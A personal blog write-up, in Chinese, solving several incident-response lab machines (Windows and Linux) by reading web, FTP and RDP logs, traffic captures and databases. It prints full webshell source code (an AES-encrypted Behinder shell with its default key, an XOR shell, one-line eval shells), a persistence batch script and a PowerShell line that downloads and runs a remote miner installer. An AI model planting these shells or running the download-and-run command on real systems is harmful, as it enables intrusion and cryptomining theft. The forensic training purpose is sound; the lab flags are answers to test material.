前言
最近在学应急,刚好看到知攻善防实验室出品的应急响应靶场,这里记录一下自己的题解过程。
靶场来自:知攻善防实验室
靶场下载链接:
https://pan.quark.cn/s/4b6dffd0c51a一、 Windows应急响应靶机-Web1
前景需要
小李在值守的过程中,发现有CPU占用飙升,出于胆子小,就立刻将服务器关机,并找来正在吃苕皮的hxd帮他分析。
挑战内容
-
攻击者的shell密码 -
攻击者的IP地址 -
攻击者的隐藏账户名称 -
攻击者挖矿程序的矿池域名(仅域名) -
有实力的可以尝试着修复漏洞
说明
桌面上有一个administrator用户的桌面上解题程序,输入正确答案即可解题。
相关账户密码
用户:administrator
密码:[email protected]
解题过程
打开虚拟机后先把Windows Defender关闭,否则木马一打开就自动被删了。
1、既然是Windows Server 2022,那么先分析Apache日志:C:phpstudy_proExtensionsApache2.4.39logsaccess.log.1708905600
这就很明显了,木马就是:/content/plugins/tips/shell.php,我们打开这个文件看一看:
<?php
@error_reporting(0);
session_start();
$key='e45e329feb5d925b'; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents('php://input');
if(!extension_loaded('openssl'))
{
$t='base64_'.'decode';
$post=$t($post.'');
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, 'AES128', $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{publicfunction __invoke($p) {eval($p.'');}}
@call_user_func(new C(),$params);
?>
冰蝎的木马,连接密码就是:rebeyond了。
2、攻击者的IP地址还看Apache日志:192.168.126.1
3、D盾直接就看到了,隐藏账户:hack168$
4、在hack168$用户的桌面发现了Kuang.exe文件:
原本想运行起来,看看外联的地址,但是运行后直接就卡死了,那就只能换种方法了。
在线的沙箱全都试了一遍,分析不出来矿池的域名,只能从挖矿文件本身下手了。
看图标是pyinstaller打包,用pyinstxtractor进行反编译:
得到pyc文件,还要继续反编译:
去找网上的在线反编译网站:
得到了源码文件:
# Visit https://www./string/pyc-compile-decompile for more information
# Version : Python 3.8
import multiprocessing
import requests
def cpu_intensive_task():
try:
requests.get('http://wakuang.', 10, **('timeout',))
finally:
continue
continue
continue
if __name__ == '__main__':
cpu_count = multiprocessing.cpu_count()
processes = (lambda.0: [ multiprocessing.Process(cpu_intensive_task, **('target',)) for _ in.0 ])(range(cpu_count))
for process in processes:
process.start()
for process in processes:
process.join()
那么矿池的域名很明显了:wakuang.
5、先查看日志分析黑客是如何攻进去的:
192.168.126.1 - - [26/Feb/2024:22:34:28 +0800] 'POST /admin/account.php?action=dosignin&s= HTTP/1.1' 302 -
……
192.168.126.1 - - [26/Feb/2024:22:36:12 +0800] 'POST /admin/account.php?action=dosignin&s= HTTP/1.1' 302 -
192.168.126.1 - - [26/Feb/2024:22:37:09 +0800] 'POST /admin/account.php?action=dosignin&s= HTTP/1.1' 302 -
192.168.126.1 - - [26/Feb/2024:22:37:09 +0800] 'GET /admin/ HTTP/1.1' 200 18865
……
192.168.126.1 - - [26/Feb/2024:22:45:57 +0800] 'GET /admin/plugin.php?action=del&plugin=tips/tips.php&token=2dac908ae2df3b0237dee7081da123d213176d24 HTTP/1.1' 302 -
192.168.126.1 - - [26/Feb/2024:22:45:57 +0800] 'GET /admin/plugin.php?activate_del=1 HTTP/1.1' 200 14725
192.168.126.1 - - [26/Feb/2024:22:45:57 +0800] 'POST /admin/plugin.php?action=check_update HTTP/1.1' 400 94
192.168.126.1 - - [26/Feb/2024:22:46:05 +0800] 'POST /admin/plugin.php?action=upload_zip HTTP/1.1' 302 -
192.168.126.1 - - [26/Feb/2024:22:46:05 +0800] 'GET /admin/plugin.php?activate_install=1 HTTP/1.1' 200 16182
192.168.126.1 - - [26/Feb/2024:22:46:05 +0800] 'POST /admin/plugin.php?action=check_update HTTP/1.1' 400 94
192.168.126.1 - - [26/Feb/2024:22:46:08 +0800] 'GET /admin/plugin.php?action=active&plugin=tips/tips.php&token=2dac908ae2df3b0237dee7081da123d213176d24 HTTP/1.1' 302 -
192.168.126.1 - - [26/Feb/2024:22:46:08 +0800] 'GET /admin/plugin.php?active=1 HTTP/1.1' 200 16392
192.168.126.1 - - [26/Feb/2024:22:46:08 +0800] 'POST /admin/plugin.php?action=check_update HTTP/1.1' 400 94
192.168.126.1 - - [26/Feb/2024:22:46:20 +0800] 'GET /content/plugins/tips HTTP/1.1' 301 252
192.168.126.1 - - [26/Feb/2024:22:46:20 +0800] 'GET /content/plugins/tips/ HTTP/1.1' 404 -
192.168.126.1 - - [26/Feb/2024:22:46:23 +0800] 'GET /content/plugins/tips/shell.php HTTP/1.1' 200 -
……
192.168.126.1 - - [26/Feb/2024:22:46:35 +0800] 'GET /content/plugins/tips/shell.php?888666=619 HTTP/1.1' 200 -
关键日志已经摘出来了,其实已经很明显了,黑客首先是大量的POST请求:/admin/account.php,应该是在爆破密码,登录进去之后访问了plugin.php页面,然后就开始访问shell.php页面了,因此整个流程是:
1、爆破后台账号密码 - 对应管理员弱口令
查看数据库中的后台密码(数据库账号密码在网站根目录的config.php中):
mysql> select uid,username,password from emlog_user;
+-----+----------+------------------------------------+
| uid | username | password |
+-----+----------+------------------------------------+
| 1 | admin | $P$BZFmadazYLJBS3d.neHGpPYIc4uSrj0 |
+-----+----------+------------------------------------+
密码上cmd5可以查出来,但是需要付费,应该是个弱口令
2、进后台后直接在plugin.php上传了木马 - 对应这个页面的文件上传漏洞
3、连接木马控制机器,创建了隐藏用户,运行了挖矿程序弱口令就改成强口令即可,至于文件上传漏洞去搜:emlog v2.2.0后台插件上传漏洞修复即可。
二、 Windows应急响应靶机-Web2
前景需要
小李在某单位驻场值守,深夜12点,甲方已经回家了,小李刚偷偷摸鱼后,发现安全设备有告警,于是立刻停掉了机器开始排查。
挑战内容
-
攻击者的IP地址(两个)? -
攻击者的webshell文件名? -
攻击者的webshell密码? -
攻击者的伪QQ号? -
攻击者的伪服务器IP地址? -
攻击者的服务器端口? -
攻击者是如何入侵的(选择题)? -
攻击者的隐藏用户名?
关于靶机启动
使用Vmware启动即可,如启动错误,请升级至Vmware17.5以上
直接运行桌面上“解题.exe”即可
相关账户密码
用户:administrator
密码:[email protected]
解题过程
1、既然是Windows server,应该是有web服务的,还是去看日志:C:phpstudy_proExtensionsApache2.4.39logsaccess.log.1709164800
192.168.126.135 - - [29/Feb/2024:12:38:30 +0800] 'GET /7AuHIG HTTP/1.1' 404 55771
192.168.126.135 - - [29/Feb/2024:12:38:31 +0800] 'GET /RQhJhE HTTP/1.1' 404 55771
192.168.126.135 - - [29/Feb/2024:12:38:31 +0800] 'GET /.Oocso2 HTTP/1.1' 404 55771
192.168.126.135 - - [29/Feb/2024:12:38:31 +0800] 'GET /z6Ak60/ HTTP/1.1' 404 55771
192.168.126.135 - - [29/Feb/2024:12:38:31 +0800] 'GET /Mw9a5c.php HTTP/1.1' 404 55771
……
192.168.126.135 - - [29/Feb/2024:12:39:23 +0800] 'GET /.git/logs/head HTTP/1.1' 404 55771
192.168.126.135 - - [29/Feb/2024:12:39:33 +0800] 'GET /.htaccess-dev HTTP/1.1' 404 55771
192.168.126.135 - - [29/Feb/2024:12:39:42 +0800] 'GET /wp-admin/ HTTP/1.1' 302 -
192.168.126.135 - - [29/Feb/2024:12:40:03 +0800] 'GET // HTTP/1.1' 301 -
192.168.126.135 - - [29/Feb/2024:12:40:03 +0800] 'GET / HTTP/1.1' 200 83648
192.168.126.135 - - [29/Feb/2024:12:54:22 +0800] 'GET /readme.html HTTP/1.1' 200 7399
192.168.126.135 - - [29/Feb/2024:12:54:22 +0800] 'GET /wp-admin/css/install.css?ver=20100228 HTTP/1.1' 200 6219
192.168.126.135 - - [29/Feb/2024:12:54:22 +0800] 'GET /wp-admin/images/wordpress-logo.png HTTP/1.1' 200 2480
192.168.126.135 - - [29/Feb/2024:12:54:22 +0800] 'GET /wp-admin/images/wordpress-logo.svg?ver=20131107 HTTP/1.1' 200 1521
192.168.126.135 - - [29/Feb/2024:13:02:00 +0800] 'GET /system.php HTTP/1.1' 200 -
关键日志摘出来了,思路很清楚:
1、爆破后台,找到了/wp-admin
2、找到后台后应该是登进去了,不然不会访问到images目录,但是攻击者是怎么知道账号密码的,这里有点疑惑
3、上传木马,从日志里没有分析出来攻击者上传木马的方法,突然就在利用system.php这个文件了。
那么IP地址肯定就是:192.168.126.135
第二个IP在apache的日志中没有出现,那么猜测是攻击者通过RDP远程连接利用了另一个IP,查看一下Windows的系统日志,筛选远程登录成功的日志:
那就很清楚了,攻击者的登录IP是:192.168.126.129
2、webshell文件名从apache日志里就分析出来了:system.php
3、找到这个文件:C:phpstudy_proWWWsystem.php
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='hack6618';
$payloadName='payload';
$key='7813d1590d28a7dd';
if (isset($_POST[$pass])){
$data=encode(base64_decode($_POST[$pass]),$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
if (strpos($payload,'getBasicsInfo')===false){
$payload=encode($payload,$key);
}
eval($payload);
echo substr(md5($pass.$key),0,16);
echo base64_encode(encode(@run($data),$key));
echo substr(md5($pass.$key),16);
}else{
if (strpos($data,'getBasicsInfo')!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}
那密码就很明显了:hack6618
4、伪QQ号刚开始有点不明白哪里会用到,后来想到wordpress,猜想有可能攻击者注册账号可能要输入信息,那就查看一下,结果找了一圈也没有,本来是先跳过了,然后定位文件的时候翻到了这里:C:UsersAdministratorDocumentsTencent Files,有一个文件夹,名字就是QQ号:777888999321
5、黑客登录QQ大概率就是为了传输文件,那就进去看看……进去后看到了frp
frpc.ini里面肯定有服务器的地址:
[common]
server_addr = 256.256.66.88
server_port = 65536
# 这IP和端口跟闹着玩一样
6、端口肯定就是frp里的端口了:65536
7、上面说了,apache日志里是没看到攻击者的入侵方式的,只看到攻击者找到后台就直接利用木马了,仔细想想还有什么方式可以上传木马呢?排除之后就剩ftp了,查看FTP的日志记录:C:phpstudy_proExtensionsFTP0.9.60Logsfzs-2024-02-29.log
(000001) 2024/2/29 12:35:30 - (not logged in) (192.168.126.135)> Connected on port 21, sending welcome message...
(000001) 2024/2/29 12:35:30 - (not logged in) (192.168.126.135)> 220 FileZilla Server 0.9.60 beta written by Tim Kosse ([email protected]) Please visit http://sourceforge.
(000001) 2024/2/29 12:35:30 - (not logged in) (192.168.126.135)> could not send reply, disconnected.
(000002) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> Connected on port 21, sending welcome message...
(000002) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> 220 FileZilla Server 0.9.60 beta written by Tim Kosse ([email protected]) Please visit http://sourceforge.
(000003) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> Connected on port 21, sending welcome message...
(000011) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> USER root
(000011) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> 331 Password required for root
(000017) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> 331 Password required for root
(000008) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> USER root
(000008) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> 331 Password required for root
(000043) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> 530 Login or password incorrect!
(000020) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> PASS ********
(000020) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> 530 Login or password incorrect!
(000045) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> PASS *********
……
(000138) 2024/2/29 12:48:31 - (not logged in) (192.168.126.135)> PASS ***********
(000138) 2024/2/29 12:48:31 - admin (192.168.126.135)> 230 Logged on
……
(000141) 2024/2/29 13:01:39 - admin (192.168.126.135)> STOR system.php
(000141) 2024/2/29 13:01:39 - admin (192.168.126.135)> 150 Opening data channel for file upload to server of '/system.php'
(000141) 2024/2/29 13:01:39 - admin (192.168.126.135)> 226 Successfully transferred '/system.php'
那这就很清楚了,先是大量爆破FTP的admin账户的密码,爆破成功后登录进去,传了system.php文件,然后开始用木马。这也解释了上面为什么日志里没看到如何攻击进去的,却突然就开始利用木马了。
然后通过QQ传输了Frp,接下来就是做反向代理,创建隐藏用户
8、隐藏账号,直接用D盾就能看到:hack887$
三、 Windows应急响应靶机-Web3
前景需要
小苕在省护值守中,在灵机一动情况下把设备停掉了,甲方问:为什么要停设备?小苕说:我第六感告诉我,这机器可能被黑了。
挑战内容
-
攻击者的两个IP地址 -
隐藏用户名称 -
黑客遗留下的flag【3个】
说明
本虚拟机的考点不在隐藏用户以及ip地址,仔细找找把。
关于靶机启动
解压后双击.ovf文件,使用Vmware打开,直接导入即可。
相关账户密码:
administrator
xj@123456
解题过程
1、先看看有没有木马,用D盾扫WWW目录:
那就打开看看吧:
# 404.php
<?php eval($_POST['pass']); ?>
# post-safe.php
<?php eval($_POST['pass']);?>
# 两个一句话
看看apache日志吧:D:phpstudy_proExtensionsApache2.4.39logsaccess.log.1710201600
192.168.75.129 - - [12/Mar/2024:11:22:50 +0800] 'GET /zb_users/theme/aymFreeFive/template/404.php HTTP/1.1' 404 -
因为已经肯定404.php是木马了,因此访问这个文件的肯定是攻击者,全部日志里只有192.168.75.129访问了这个文件,这个肯定是攻击者IP无疑,那么还差一个攻击者IP,我们去RDP日志里看看:
屡试不爽啊,果然找到了攻击者的另一个IP:192.168.75.130,甚至他的隐藏账户都有了:hack6618$
2、攻击者的隐藏账户上面已经出来了,也可以用D盾看:hack6618$
3、既然有隐藏账户,那就去看看这个账户的目录:
# C:Usershack6618$Downloadssystem.bat
echo ^<?php eval($_POST['pass']); ?^> > D:phpstudy_proWWWzb_usersthemeaymFreeFivetemplate404.php
echo flag{888666abc}
# 第一个flag找到了
第二个flag在数据库中看到了:flag{H@Ck@sec}
# 通过skip-grant-tables连接数据库
mysql> select mem_ID,mem_Name,mem_Password,mem_Email,mem_IP,mem_Intro from zbp_member;
+--------+----------+----------------------------------+-----------------+----------------+----------------+
| mem_ID | mem_Name | mem_Password | mem_Email | mem_IP | mem_Intro |
+--------+----------+----------------------------------+-----------------+----------------+----------------+
| 1 | admin | 3d3f417b287cc2c0280e396267062164 | [email protected] | 127.0.0.1 | |
| 2 | Hacker | 12bfcd08c23e2291338aec8d1636d460 | [email protected] | 192.168.75.130 | flag{H@Ck@sec} |
+--------+----------+----------------------------------+-----------------+----------------+----------------+
第三个flag也是在排除各个应急响应的检查项中找到的,最终在任务计划程序中看到了:flag{zgsfsys@sec}
攻击者的入侵轨迹:
1、暴力破解管理员密码
2、登录后台之后创建了Hack用户
2、然后上传网站的插件,构造了带webshell的插件,路径就是/zb_users/theme/aymFreeFive
3、访问木马:/zb_users/theme/aymFreeFive/404.php
4、连接木马后新建了一个隐藏账户hack6618$
5、为hack6618$用户建了一个计划任务,定时执行桌面的system.bat,脚本就是一直生成404.php
四、 Linux应急响应靶机-1
前景需要
小王急匆匆地找到小张,小王说’李哥,我dev服务器被黑了’,快救救我!!
挑战内容
-
黑客的IP地址
-
遗留下的三个flag
说明
defend/defend
root/defend
解题过程
1、首先是黑客的IP地址,这里原本以为直接查看网络连接就能看到,结果并没有:netstat -ano
然后就看看所有用户的登录时间吧:lastb
猜测这个就是黑客的IP地址:192.168.75.129
标注:这里可能只是碰巧了,官方的题解是查看redis的连接日志(这样才是合理的)。
cat /var/log/redis/redis.log | grep Acc2、查看历史命令:history
flag{thisismybaby}
3、一项一项排查,最后排查到开机启动项:/etc/rc.d/rc.local,找到了第二个flag
flag{kfcvme50}
4、在查看用户的时候发现有redis用户,猜测黑客有可能是通过redis未授权攻进来的。
查看root/.ssh/authorized_keys,确实有一个公钥,但是没有看到flag。
也没有web目录。
那就查看一下redis的配置文件吧:/etc/redis.conf
拿到第三个flag:flag{P@ssW0rd_redis}
五、 Linux应急响应靶机-2
前景需要
看监控的时候发现webshell告警,领导让你上机检查你可以救救安服仔吗!!
挑战内容
-
提交攻击者IP -
提交攻击者修改的网站后台管理员密码(明文) -
提交第一次Webshell的连接URL(http://.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg) -
提交Webshell连接密码 -
提交数据包的flag1 -
提交攻击者使用的后续上传的木马文件名称 -
提交攻击者隐藏的flag2 -
提交攻击者隐藏的flag3
说明
root/Inch@957821.
解题过程
1、既然是webshell告警,肯定有web服务,那就先看一下是什么:ps -ef
nginx的话,日志就是:access.log文件,查找一下:
find / -name access.log
# /www/wwwlogs/access.log
那就分析日志吧:
日志中发现192.168.20.1这个IP一直在访问phpmyadmin页面,并且频率很高,大概率就是攻击IP。
2、后台管理员密码肯定是在数据库里了,但是不知道MySQL的密码,那就设置跳过检测:
/etc/my.cnf
在[mysqld]下面一行加上skip_grant_tables
然后可以直接连接MySQL,不需要密码。
进来后查看数据库发现有一个kaoshi,查看其中的表,发现有一个x2_user,表中分别有username和userpassword字段,那就查询一下:
mysql> select username,userpassword from x2_user;
+-----------------+----------------------------------+
| username | userpassword |
+-----------------+----------------------------------+
| peadmin | f6f6eb5ace977d7e114377cc7098b7e3 |
| 教师管理员 | 96e79218965eb72c92a549dd5a330112 |
| zgsf | af0c68603004a1b5af4d87a71a813057 |
| zgsfAdmin | ed2b3e3ce2425550d8bfdea8b80cc89a |
+-----------------+----------------------------------+
4 rows in set (0.00 sec)
解密一下,就解出来了两个分别是:
peadmin Network@2020
教师管理员 111111
那么密码就是:Network@2020
3、同上,在流量包中过滤HTTP请求后,第一条就是:
连接URL就是:index.php?user-app-register
4、打开流量包,过滤HTTP请求,第一条直接追踪HTTP流:
连接密码就是:Network2020
5、打开流量包,先过滤HTTP请求,发现有个请求是/flag,追踪流看看:
看到了flag:flag1{Network@_2020_Hack}
6、从流量包中看到,请求的路径从index.php?user-app-register变成了version.php,但是这个请求是404,然后就是version2.php,那么可能这个就是木马,追踪流看看:
应该就是冰蝎马,木马文件名就是:version2.php
在tcp.stream eq 27中找到了木马的源文件,冰蝎无疑了:
虽然题目没有涉及到冰蝎的流量解密,但是这里还是记录一下:
冰蝎流量解密
冰蝎加密原理:先aes128,然后base64
默认密钥:e45e329feb5d925b
默认IV:0123456789abcdef
mode:CBC
7、历史命令中看到编辑了:alinotify.php
搜索一下这个文件:
$ find / -name alinotify.php
# /www/wwwroot/127.0.0.1/api/alinotify.php
# /www/wwwroot/127.0.0.1/.api/alinotify.php
一个一个查看,第一个没有什么有价值的东西,第二个里面有个flag:
$ cat /www/wwwroot/127.0.0.1/.api/alinotify.php
include PEPATH.'/lib/init.cls.php';
$app = new app(new ginkgo);
$app->run();
$flag2 = 'flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}';
?>
8、查看历史命令:cat /root/.bash_history
查看环境变量:env
flag3=flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}
六、 Windows近源攻击
前景需要
小王从某安全大厂被优化掉后,来到了某私立小学当起了计算机老师。某一天上课的时候,发现鼠标在自己动弹,又发现除了某台电脑,其他电脑连不上网络。感觉肯定有学生捣乱,于是开启了应急。
挑战内容
-
攻击者的外网IP地址 -
攻击者的内网跳板IP地址 -
攻击者使用的限速软件的md5大写 -
攻击者的后门md5大写 -
攻击者留下的flag
说明
运行桌面上’解题工具.exe’即可
相关账户密码
Administrator
zgsf@2024
解题过程
这个不太懂哟,等搞懂了后面再补充吧!!!
七、Windows挖矿事件
前景需要
机房运维小陈,下班后发现还有工作没完成,然后上机器越用越卡,请你帮他看看原因。
挑战内容
-
攻击者的IP地址 -
攻击者开始攻击的时间 -
攻击者攻击的端口 -
挖矿程序的md5 -
后门脚本的md5 -
矿池地址 -
钱包地址 -
攻击者是如何攻击进入的
说明
运行桌面上的解题工具即可。
相关账户密码:
Administrator/zgsf@123
解题过程
1、没有web应用,那么想知道攻击者的IP应该只能从远程登录的情况来看了,先看有没有登录失败的日志:
攻击者IP很清楚了:192.168.115.131
2、开始攻击的时间,那就是这个IP第一次登录失败的时间了:2024-05-21 20:25:22
3、因为有多次的登录失败日志,所以推测这个机器被攻击的的方式应该是RDP密码的暴力破解,那攻击端口就是3389了。
4、这个机器开机后每隔一会就会运行这个程序:
推测就是一个挖矿的计划任务,那么我们先找到它,在C盘里搜索c3pool试试:
还是找到这个文件了,打开看看:
那应该这个就是挖矿程序了:xmrig.exe,计算它的MD5:A79D49F425F95E70DDF0C68C18ABC564
5、既然这个程序会运行,应该就在计划任务或者开机启动里,排查看看:
确实有一个未知文件,打开看看:
powershell -Command '$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://download./xmrig_setup/raw/master/setup_c3pool_miner.bat', $tempfile); & $tempfile 4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y; Remove-Item -Force $tempfile'
确实就是上面截图运行的程序,先计算这个文件的HASH:8414900F4C896964497C2CF6552EC4B9
6、矿池地址应该就是systems.bat里的:download.
7、钱包地址那肯定就是systems.bat里面的:4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y
8、攻击者入侵的路径,上面推测过了,应该就是暴力破解了RDP的密码。